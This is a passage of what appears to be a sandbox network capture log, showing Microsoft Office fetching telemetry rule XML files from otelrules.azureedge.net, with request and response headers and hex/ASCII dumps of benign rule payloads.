                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      43192.168.2.104974913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:23 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:23 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                      x-ms-request-id: 7090c7f2-e01e-000c-3ea1-428e36000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213823Z-174f7845968swgbqhC1EWRmnb40000001280000000001y6p
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      44192.168.2.104975413.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:24 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:25 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 420
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                      x-ms-request-id: 19b520d0-901e-0015-6e4e-41b284000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213825Z-174f78459684bddphC1EWRbht400000011s00000000089se
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:25 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      45192.168.2.104975513.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:25 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:25 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                      x-ms-request-id: 9832b288-801e-002a-5afe-4131dc000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213825Z-174f7845968px8v7hC1EWR08ng000000124g00000000n1k0
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:25 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      46192.168.2.104975613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:25 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:25 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                      x-ms-request-id: 56bedb93-201e-0033-7607-41b167000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213825Z-174f7845968j6t2phC1EWRcfe8000000121g00000000n3ke
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:25 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      47192.168.2.104975713.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:25 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:25 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                      x-ms-request-id: 954f8be1-001e-00ad-4fb5-42554b000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213825Z-174f7845968j6t2phC1EWRcfe8000000124000000000cm6y
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:26 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      48192.168.2.104976013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:25 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:26 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 423
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                      x-ms-request-id: 9dc9d887-801e-0015-73b3-42f97f000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213826Z-174f78459684db9fhC1EWRc7g400000001x000000000mm1u
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:26 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      49192.168.2.104976613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:27 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:27 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 478
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                      x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213827Z-174f7845968n2hr8hC1EWR9cag00000011r00000000031uh
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:27 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      50192.168.2.104976813.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:27 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:27 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                      x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213827Z-174f7845968psccphC1EWRuz9s00000012900000000075tq
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:28 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      51192.168.2.104976713.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:27 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:28 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                      x-ms-request-id: 5685fe29-701e-0098-4071-40395f000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213828Z-174f7845968cdxdrhC1EWRg0en00000011ug00000000n7fq
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
